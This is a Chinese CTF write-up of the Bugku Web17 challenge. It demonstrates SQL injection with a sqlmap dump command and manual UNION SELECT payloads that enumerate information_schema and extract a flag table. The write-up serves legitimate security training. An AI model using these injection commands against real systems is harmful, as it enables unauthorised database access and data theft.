首页 > 其他分享 >Bugku-Web17

Bugku-Web17

时间:2023-08-29 16:57:49浏览次数:37  
标签:Bugku group name -- Web17 table select schema

这是sql的注入题

我自己的sql注入学的还不是很到位,这个题目有很学习的意味:;;

images
第一个是通过sqlmap的注入的方式:

python3 .\sqlmap.py -u "http://114.67.246.176:18696/index.php" --method POST --data "id=1" -D skctf -T fl4g -C skctf_flag --dump

images
python sqlmap.py -u url --method POST --data "id=1" 是post提交参数的sqlmap格式

① 用 --dbs 获取数据库
② 用 -D 数据库名 --tables 爆出表名
③ 用 -D 数据库名 -T 表名 --columns 爆出字段名
④ 用 -D 数据库名 -T 表名 -C 字段名 --dump 爆出数据

第二个是通过手工注入的方式:
感觉博主讲的挺好的,所以想就摘抄下来了,

知识补充:union select 手工注入
mysql中的information_schema 结构用来存储数据库系统信息 

information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表  

SCHEMATA 存储数据库名的, 

关键字段:SCHEMA_NAME,表示数据库名称 

TABLES 存储表名的 

关键字段:TABLE_SCHEMA表示表所属的数据库名称; 

TABLE_NAME表示表的名称 

COLUMNS 存储字段名的 

关键字段:TABLE_SCHEMA表示表所属的数据库名称; 

TABLE_NAME表示所属的表的名称 

COLUMN_NAME表示字段名 

 

爆所有数据名 

select group_concat(SCHEMA_NAME) from information_schema.schemata 

得到当前库的所有表 

select group_concat(table_name) from information_schema.tables where table_schema=database() 

得到表中的字段名(列名) 将敏感的表进行16进制编码adminuser=0x61646D696E75736572

select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572 

得到字段(列)具体的值     select group_concat(username,0x3a,password) from adminuser

group_concat()函数是将数据作为字符串输出,中间以:间隔开(因为0x3a是:的16进制ascii码)

操作过程中需要注意:

table_name

select group_concat(table_name) from information_schema.tables where table_schema=database()

column_name

select group_concat(column_name) from information_schema.columns where table_name='fl4g'

images
images
images

images
images
images

images
id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),user(),version()#

images
id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='fl4g'),user(),version()#

images
images

标签:Bugku,group,name,--,Web17,table,select,schema
From: https://www.cnblogs.com/KAKSKY/p/17665293.html

相关文章

  • Bugku-冬至红包
    这个题目的考察的还是代码审计,还有eval函数的利用,当然还有对过滤这些因素的审查。代码块就直接放下面了:先刷题,改天再回过来看。<?php    error_reporting(0);    require __DIR__.'/flag.php';    $exam = 'return\''.sha1(time()).'\';';    if (!i......
  • BUGKU
    初入Python,看到很多大佬都是通过写脚本的方式获取到FLAG,因为抓到的包的response里falg一直会变。这里呈上大佬的Python脚本。顺便学习,把函数的用法记下,方便日后自己的学习。pyjin1#!/usr/bin/envpython3blacklist=["/","0","1","2","3","4","5","6",&q......
  • BUGKU逆向reverse 1-8题
    练习IDA两年半打开尘封已久的bugku,从题目中练习使用,现在都已经是新版本了orz入门逆向运行baby.exe将解压后的baby.exe拖到IDA里面主函数中找到mov指令可以看到这里就是flagflag{Re_1s_S0_C0OL}signin下载附件解压之后是sign_in.apk,Android逆向我不会啊orz丢到AndroidKil......
  • CTFer成长记录——CTF之Web专题·bugku—never_give_up
    一、题目链接https://ctf.bugku.com/challenges/detail/id/88.html二、解法步骤  打开网页,url中看到id=1,修改成2、3、4发现无反应。然后查看网页源代码:,提示一个网址,直接访问看看:发现url跳转到了bugku的论坛:    BP抓1p.html网页的包,在返回包中发现一串密文:  --JTI......
  • bugku_文件上传_wp
    bugku_文件上传payload点击查看payloadPOST/index.phpHTTP/1.1Host:114.67.175.224:16103Content-Length:308Cache-Control:max-age=0Upgrade-Insecure-Requests:1Origin:http://114.67.175.224:16103Content-Type:Multipart/form-data;boundary=----WebKitFo......
  • CTFer成长记录——CTF之Web专题·bugku—备份是个好习惯
    一、题目链接https://ctf.bugku.com/challenges/detail/id/83.html?id=83二、解法步骤  打开网站,发现是一串字符串:    解码:[空密码]/[EmptyString],无结果。题目提示“备份是个好习惯”,那么尝试访问index.php.bak和index.php.swp,这两个文件,看看存不存在。于是在index.......
  • CTFer成长记录——CTF之Web专题·bugku-啊哒
    一、题目链接  https://ctf.bugku.com/challenges/detail/id/6.html?id=6二、解法步骤  打开图片:  显示完整,似乎没有文件高度的问题。右键查看属性——>文件详细信息:发现一串16进制数:尝试转换成字符串:https://www.sojson.com/hexadecimal.html  得到:sdnisc_20......
  • CTFer成长记录——CTF之Web专题·bugku-眼见非实
    一、题目链接  https://ctf.bugku.com/challenges/detail/id/5.html二、解法步骤  解法压缩包是一个.docx文件,打开该文件后发现一堆乱码:  结合题意:“眼见非实”,猜测该docx文件融合了其他的文件。用010打开看看:  发现了压缩包的文件头,于是用binwalk尝试文件拆分:binwal......
  • CTFer成长记录——CTF之Web专题·bugku-eval
    一、题目链接https://ctf.bugku.com/challenges/detail/id/75.html?id=75二、解法步骤  打开网页是一段php代码,其中include"flag.php"提示可能有文件包含漏洞,接着使用了eval函数,那么可能存在命令执行漏洞。    先用system('ls')命令看看:?hello=system('ls'):......
  • CTFer成长记录——CTF之Web专题·bugku-Simple_SSTI_2
    一、题目链接https://ctf.bugku.com/challenges/detail/id/203.html二、解法步骤  题目是SSTI,也就是服务器模板注入,页面提示我们需要传递一个flag参数。  由于是模板,可以传flag={{config}}看看:显示说明这里存在命令执行的漏洞,查询资料发现此处可以执......